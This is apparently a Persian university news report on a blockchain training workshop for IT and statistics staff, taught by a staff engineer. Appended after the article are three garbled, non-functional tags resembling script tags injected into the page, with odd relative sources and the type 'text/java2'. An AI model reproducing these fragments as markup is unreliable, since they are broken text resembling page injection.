در مدیریت فناوری اطلاعات، ارتباطات و آمار دانشگاه انجام شد:

برگزاری کارگاه آموزشی کارکنان فناوری اطلاعات، ارتباطات و آمار دانشگاه  با موضوع “بلاک چین”

دومین دوره کارکنان مدیریت فناوری اطلاعات، ارتباطات و آمار دانشگاه با محوریت “بلاک چین” به مدرسی مهندس میثم جهانی با برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، کارگاه آموزشی “بلاک چین” با حضور کارکنان مدیریت فناوری اطلاعات، ارتباطات و آمار دانشگاه به مدرسی مهندس میثم جهانی برگزار شد.

در این دوره مهندس میثم جهانی کارشناس فناوری اطلاعات،ارتباطات و آمار دانشگاه  ضمن تشریح مشکلات وجود در شبکه های متمرکزدر حوزه های مختلف دانشگاه، به بررسی روش جدیدی با نام “بلاک چین” پرداخت و راه کارهای مناسبی را  برای رفع موانع موجود تدریس کرد.

در پایان کارگاه  کارشناسان و کارکنان فناوری اطلاعات، ارتباطات و آمار دانشگاه  نظرات و پیشنهادات خود را در روش نوین و جدید “بلاک چین” عنوان کردند.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>